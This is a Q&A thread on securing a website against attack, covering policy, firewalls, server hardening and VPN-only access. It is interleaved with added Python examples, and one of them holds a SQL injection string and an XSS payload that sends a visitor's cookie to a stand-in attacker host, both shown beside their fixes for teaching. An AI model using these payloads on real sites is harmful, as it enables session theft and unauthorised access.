How do you prevent your site from getting hacked?
If it is not 100% preventable, how can you tighten security to reduce that ease aside from site mirroring and regular password changes?
Answer:
First start with the understanding that there is no such thing as 100% secure. The moment you introduce "usability" into a system you also introduce risk. Understanding this and, more importantly, communicating this to the "higher ups" is critical. Organizational infosec is about mitigating that risk to an acceptable level. The place to start doing that is with policy and procedure surrounding your infosec program (the SANS Institute has some great resources - link included below). The thing about good P&P is that not only can it provide clear direction and oversight, it can also help save on implementation costs. Here are just a few of the benefits of starting from clear and communicated P&P:

- Appropriate layered mitigation for the information classification levels
- Correct configuration and management of security devices for the environment
- Appropriate, consistent (and legal!) monitoring levels
- Clear oversight and separation of duties (who's watching the watcher?)

The trick is deciding on the balance between usability and security, fixing that point of balance (as best as you are able), and then using your P&P and periodic assessment to make sure that balance stays in place. Some of the moving parts you need to consider:

- Network infrastructure: You may be locked down, but if you are in a colocation facility, how are you segregated from others? Look at a network map - are there points of entry you were unaware of?
- Hardware security: Not just the servers that your site is located on, but also the network infrastructure devices. I can't tell you how many times we have found a server locked down, but the Cisco router is many updates behind (if updates have been performed at all). Even security monitoring devices can be an attack vector if they are improperly configured or not updated.
- OS security: Patch management (obviously), but also server hardening appropriate for the OS, and placement on the network.
- Services hardening: Part of server hardening is turning off unneeded services, but then you also need to harden the configuration of services that you leave on.
- Firewall configuration: Firewalls are important, layered firewalls are better (network, DMZ and host based). A poorly configured firewall can become an attack vector. Make sure to consider ingress (inbound) AND egress (outbound) rules, especially on your DMZ. Consider also remote management: Is it necessary? Is it possible to restrict remote management to internal networks, or at least to specific network IPs or blocks?
- Web application assessment: All of the steps above don't amount to much if your web application can be used and turned against the system or network itself. Some common means of doing this are SQL injection (through poor input validation on the part of the developers) and cross-site scripting.
- Monitoring and assessment
- Domain security: Who is the registrant, admin, etc.? Evaluate how the domain is managed. What are the procedures and policies surrounding the management of the domain?
- Incident response: This is a big one. Who can respond to an incident? Who can instantiate an incident? When is an incident resolved? Policy and procedure is a big one here. I call it my "bad date" rule. I used to tell my daughter growing up that she needed to have a plan already decided on if a date went bad BEFORE it did so. This way she wasn't making key decisions while in crisis mode. It's the same with incident response.
- Periodic review of policy and procedure: Business needs change, systems are added and removed from an environment, employees come and go, applications are updated, etc. You should consider a scheduled review of your policy and procedure to factor in these changes.

Potentially useful links:
- Definitions of Vulnerability, Threat and Risk: http://www.digitalthreat.net/2009/06/threat-vs-vulnerability-vs-risk/
- Some starter information on Policy and Procedure: http://www.sans.org/security-resources/policies/
- Some discussion on information classification: http://17799-news.the-hamster.com/issue09-news1.htm
- Examples and discussion of SQL injection and cross-site scripting: http://www.itproportal.com/2011/01/24/hacker-selling-access-government-military-and-education-sites/ http://msdn.microsoft.com/en-us/library/ms161953.aspx http://en.wikipedia.org/wiki/SQL_injection http://en.wikipedia.org/wiki/Cross_site_scripting
Aaron Hughes at Quora
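The two web-application weaknesses the answer above names, SQL injection and cross-site scripting, each shown beside its fix. This is an added example and not code from the answer; it uses Python's built-in sqlite3 module against an in-memory table constructed for the demo (the users, passwords and payloads are all made up). Note that the fix for injection is a parameterised query rather than input validation, and the fix for XSS is encoding at the point the text is written into HTML.

```python
import html
import sqlite3


def make_db():
    """Constructed demo table. The plaintext password column only keeps the
    injection easy to read; a real system compares a password hash."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "correct horse battery", "admin"),
                    ("bob", "hunter2", "user")])
    return db


def login_vulnerable(db, username, password):
    """The bug: user input is spliced into the SQL text, so a quote character
    in the input changes the structure of the query."""
    query = (f"SELECT name, role FROM users "
             f"WHERE name = '{username}' AND password = '{password}'")
    return db.execute(query).fetchone()


def login_hardened(db, username, password):
    """The fix: a parameterised query. The values travel separately from the
    SQL text, so a quote in the input is just data (no validation needed)."""
    return db.execute(
        "SELECT name, role FROM users WHERE name = ? AND password = ?",
        (username, password)).fetchone()


def render_comment_vulnerable(comment):
    """Untrusted text dropped straight into HTML: cross-site scripting."""
    return f'<p class="comment">{comment}</p>'


def render_comment_hardened(comment):
    """The fix: encode for the HTML text context at the moment of output."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def demo():
    db = make_db()
    # SQL injection: the attacker knows no password and comments out the
    # password check; "--" starts a comment in SQLite (and most SQL dialects).
    sqli_user = "alice' --"
    # XSS payload (constructed): exfiltrates the viewer's cookie to an attacker host.
    xss = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
    return {
        "sqli_vulnerable": login_vulnerable(db, sqli_user, "wrong"),
        "sqli_hardened": login_hardened(db, sqli_user, "wrong"),
        "legit_hardened": login_hardened(db, "bob", "hunter2"),
        "xss_vulnerable": render_comment_vulnerable(xss),
        "xss_hardened": render_comment_hardened(xss),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the vulnerable login returning alice's admin row for a caller who supplied no valid password, while the parameterised version returns nothing for the same input and still works for a legitimate user; the hardened comment renderer turns the script tag into inert text.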
Other answers
Reality: there are 2 types of System Administrators, those who have been hacked and those who know they have been hacked. This answer assumes that you are physically hosting the server.

1. Use a 4 IP number network to connect to your ISP. That means only 2 devices can be on the network: your firewall and your ISP's router.
2. Create a DMZ. All of your servers are behind at least one firewall.
3. Use a firewall that supports both white listing and black listing. White list services that are used by a small number of people from fixed locations. For example, if you are going to use FTP for your clients, block FTP except for the IP numbers of your client. Black list huge swathes of the Internet. If your clients are US only, black list the rest of the world. Pin hole the firewall: only open ports actually needed by a specific server. Let's say you have a DNS server, an email server and a web server, at 10.10.10.3, 10.10.10.4 and 10.10.10.5. The firewall would only need to allow traffic on port 53 going to IP 10.10.10.3; ports 25, 110 and 143 to 10.10.10.4; and port 80 going to 10.10.10.5.
4. Actually build a firewall on the servers themselves. Even if it looks repetitive, it's not.
5. Use an OS known to be secure. OpenBSD, Solaris, Debian (netinstall), perhaps Windows 2008r2. (Yes, I did build a secure server.)
6. Only install the services you need and remove the applications only needed to make the install. Debian is very good for removing these types of applications.
7. Do not open port 22 SSH on any IP number facing the Internet. NEVER EVER!!!
8. Use programs that will block brute force attacks, such as Fail2ban: http://www.fail2ban.org/wiki/index.php/Main_Page
Alan Cohen
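The pinholed, default-deny edge firewall from the answer above, together with the fail2ban-style banning it recommends, as an added Python model. This is not the answerer's configuration and not real firewall rules: it takes the answer's 10.10.10.3/.4/.5 services, adds a whitelisted FTP pinhole and a blacklisted network, bans sources that a constructed sshd auth log shows brute-forcing, and then evaluates sample flows. The client range 198.51.100.0/24, the blacklisted 192.0.2.0/24 and the 203.0.113.0/24 "Internet" addresses are RFC 5737 documentation ranges chosen for the demo, and the sliding-window ban logic is a miniature of fail2ban's, not its code.

```python
import re
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

Flow = namedtuple("Flow", "src dst dport proto", defaults=("tcp",))


class EdgeFirewall:
    """Default deny: a flow passes only through an explicit pinhole, and only
    after the blacklist, the dynamic ban list and any per-service whitelist."""

    def __init__(self):
        self.pinholes = defaultdict(set)   # dst -> {(proto, port)}
        self.whitelist = {}                # (dst, proto, port) -> [networks]
        self.blacklist = []                # networks refused outright
        self.banned = set()                # addresses added by the brute-force detector

    def pinhole(self, dst, proto, port, only_from=None):
        self.pinholes[dst].add((proto, port))
        if only_from:
            self.whitelist[(dst, proto, port)] = [ip_network(n) for n in only_from]

    def decide(self, flow):
        src = ip_address(flow.src)
        if src in self.banned:
            return "DROP (banned)"
        if any(src in net for net in self.blacklist):
            return "DROP (blacklisted)"
        if (flow.proto, flow.dport) not in self.pinholes.get(flow.dst, set()):
            return "DROP (no pinhole)"          # the default-deny path; SSH lands here
        allowed = self.whitelist.get((flow.dst, flow.proto, flow.dport))
        if allowed is not None and not any(src in net for net in allowed):
            return "DROP (not whitelisted)"
        return "ACCEPT"


# fail2ban's sshd filter in miniature: ban a source after `maxretry` failed
# logins inside a sliding `findtime` window. Syslog lines carry no year.
FAILED = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+)")


def brute_forcers(lines, maxretry=5, findtime=timedelta(minutes=10), year=2024):
    window, banned = defaultdict(deque), set()
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = window[m["ip"]]
        q.append(ts)
        while ts - q[0] > findtime:            # drop failures outside the window
            q.popleft()
        if len(q) >= maxretry:
            banned.add(m["ip"])
    return banned


# Constructed auth log: one host hammers sshd, one legitimate user mistypes twice.
SAMPLE_AUTH_LOG = """\
Jan 12 10:00:01 gw sshd[2201]: Failed password for root from 203.0.113.50 port 51122 ssh2
Jan 12 10:00:03 gw sshd[2203]: Failed password for invalid user admin from 203.0.113.50 port 51130 ssh2
Jan 12 10:00:05 gw sshd[2205]: Failed password for invalid user oracle from 203.0.113.50 port 51140 ssh2
Jan 12 10:00:07 gw sshd[2207]: Failed password for root from 203.0.113.50 port 51150 ssh2
Jan 12 10:00:09 gw sshd[2209]: Failed password for root from 203.0.113.50 port 51160 ssh2
Jan 12 10:01:00 gw sshd[2210]: Accepted publickey for alice from 198.51.100.7 port 40010 ssh2
Jan 12 10:02:30 gw sshd[2212]: Failed password for bob from 198.51.100.7 port 40020 ssh2
Jan 12 10:30:00 gw sshd[2300]: Failed password for bob from 198.51.100.7 port 40030 ssh2
""".splitlines()


def build_from_answer():
    fw = EdgeFirewall()
    fw.pinhole("10.10.10.3", "udp", 53)                                # DNS
    fw.pinhole("10.10.10.3", "tcp", 53)
    for port in (25, 110, 143):                                        # mail
        fw.pinhole("10.10.10.4", "tcp", port)
    fw.pinhole("10.10.10.5", "tcp", 80)                                # web
    fw.pinhole("10.10.10.5", "tcp", 21, only_from=["198.51.100.0/24"])  # FTP, one client
    fw.blacklist.append(ip_network("192.0.2.0/24"))                   # stands in for a region
    return fw                                                          # nothing opens 22


def evaluate(log=SAMPLE_AUTH_LOG):
    fw = build_from_answer()
    fw.banned.update(ip_address(ip) for ip in brute_forcers(log))
    probes = {
        "dns_from_internet":     Flow("203.0.113.10", "10.10.10.3", 53, "udp"),
        "web_from_internet":     Flow("203.0.113.10", "10.10.10.5", 80),
        "ssh_to_web_server":     Flow("203.0.113.10", "10.10.10.5", 22),
        "ftp_from_stranger":     Flow("203.0.113.10", "10.10.10.5", 21),
        "ftp_from_client":       Flow("198.51.100.7", "10.10.10.5", 21),
        "web_from_blacklisted":  Flow("192.0.2.9",    "10.10.10.5", 80),
        "web_from_brute_forcer": Flow("203.0.113.50", "10.10.10.5", 80),
    }
    return {name: fw.decide(flow) for name, flow in probes.items()}


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name:24} {verdict}")
```

The point of the model is the order of evaluation and the last branch: SSH to the web server is dropped not because a rule says so but because nothing opens it, which is what "pin hole the firewall" buys you. The model is IPv4 only; a real ruleset needs the same pinholes for IPv6 or an explicit drop of it.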
First of all, you should make as sure as possible that the things which are hosted on your server are secure - you may order a professional security audit, or something like that. THIS is definitely the easiest part of auditing your server; someone who is at least medium skilled in web development will find at least 1 bug in nearly every PHP (or whatever) code out there.

Second, you may want to monitor everything that's behind your website, like your server; this is also not too hard to lock up. Get some security modules like grsecurity (google it, there are lots more like this).

Try to harden every connection you are using to access your server (FTP, SSH, RDP etc.); consider using certificates. If you want to max this out you could use an L2TP/IPSec VPN using certificates, and configure any service on your server to just listen on the VPN IP. This would reduce the risk of being hacked extremely, because, if performed perfectly, only the VPN service is visible. (To max out the max, use port knocking, but that's just security by obscurity.)

If you have done all this, there are only 5 possibilities left of being hacked:
- Security hole in your operating system itself (which can't be fixed by yourself normally)
- VPN service is insecure
- Your certificate has been stolen
- You, your IT professional, or auditor failed
- Someone manages to get physical access

By the way, don't even think about securing a big website to the max; no one in the next 10 years will be able to ultimately secure something which is as big as Quora or so on (because, if you don't make any mistake in coding it, the one who developed the framework made a mistake, or someone who coded a little part of the session handler... I think you know what I'm trying to say).

greetings
Mario Dengg
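A check, added here and not from the answer above, for the advice to configure every service to listen only on the VPN IP: it parses the output of `ss -H -lntu` and reports listening sockets reachable from anything other than the VPN interface or loopback, except the ports you deliberately expose to the Internet. The VPN address 10.8.0.1, the public ports 80 and 443, and the ss output are constructed assumptions for the demo.

```python
import sys

VPN_ADDRESS = "10.8.0.1"       # assumed: the server's address on the VPN
PUBLIC_PORTS = {80, 443}       # assumed: the only services meant for the Internet

# Constructed `ss -H -lntu` output (Netid State Recv-Q Send-Q Local Peer).
SAMPLE_SS_OUTPUT = """\
tcp   LISTEN 0      128          10.8.0.1:22        0.0.0.0:*
tcp   LISTEN 0      511           0.0.0.0:80        0.0.0.0:*
tcp   LISTEN 0      128           0.0.0.0:3306      0.0.0.0:*
tcp   LISTEN 0      128              [::]:22           [::]:*
udp   UNCONN 0      0           127.0.0.1:323       0.0.0.0:*
udp   UNCONN 0      0             0.0.0.0:161       0.0.0.0:*
""".splitlines()


def parse_local(field):
    """Split ss's Local Address:Port; IPv6 is bracketed and '*' means any address."""
    host, _, port = field.rpartition(":")
    host = host.strip("[]")
    if host in ("*", ""):
        host = "0.0.0.0"
    return host, (int(port) if port.isdigit() else 0)


def exposed_listeners(lines, vpn=VPN_ADDRESS, public_ports=PUBLIC_PORTS):
    """Sockets that would answer from somewhere other than the VPN or loopback.
    A wildcard bind (0.0.0.0 or ::) is reachable on every interface, and a
    dual-stack [::] socket also accepts IPv4, so both count as exposed."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6:
            continue
        proto, host, port = parts[0], *parse_local(parts[4])
        if port in public_ports or host in {vpn, "127.0.0.1", "::1"}:
            continue
        findings.append((proto, host, port))
    return findings


if __name__ == "__main__":
    # On the server: `ss -H -lntu > listeners.txt && python3 check.py listeners.txt`;
    # with no argument the constructed sample is checked instead.
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_SS_OUTPUT
    for proto, host, port in exposed_listeners(lines):
        print(f"EXPOSED {proto} {host}:{port}")
```

On the sample, sshd bound to the VPN address and the loopback-only NTP socket pass, the web server is allowed because 80 is meant to be public, and the findings are the database on 0.0.0.0:3306, the second sshd instance on [::]:22 (which also answers IPv4 on a dual-stack host) and SNMP on 0.0.0.0:161. This catches the common mistake of hardening one service's listen address while another daemon still binds the wildcard.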
Outsource your hosting to a reliable provider who cares about security and has a good track record. There are literally hundreds of things that you need to check to ensure that you're safe. This can include verifying your server security settings and file permissions, passwords are changed (for all users) on a periodic basis, users are re-validated for continued business need, network settings are checked on a periodic basis, firewall and router rules are verified on a periodic basis, your application code is tested for vulnerabilities on a periodic basis, your systems are patched continuously without a single gap of exposure, your anti-virus is maintained and checked daily for attacks, your intrusion detection systems are working and are being monitored. This is just a short snippet of items... I could go on and on... You really don't want to do this every month. The only other option is to hire a security professional to do it in-house.
Andrew Lemke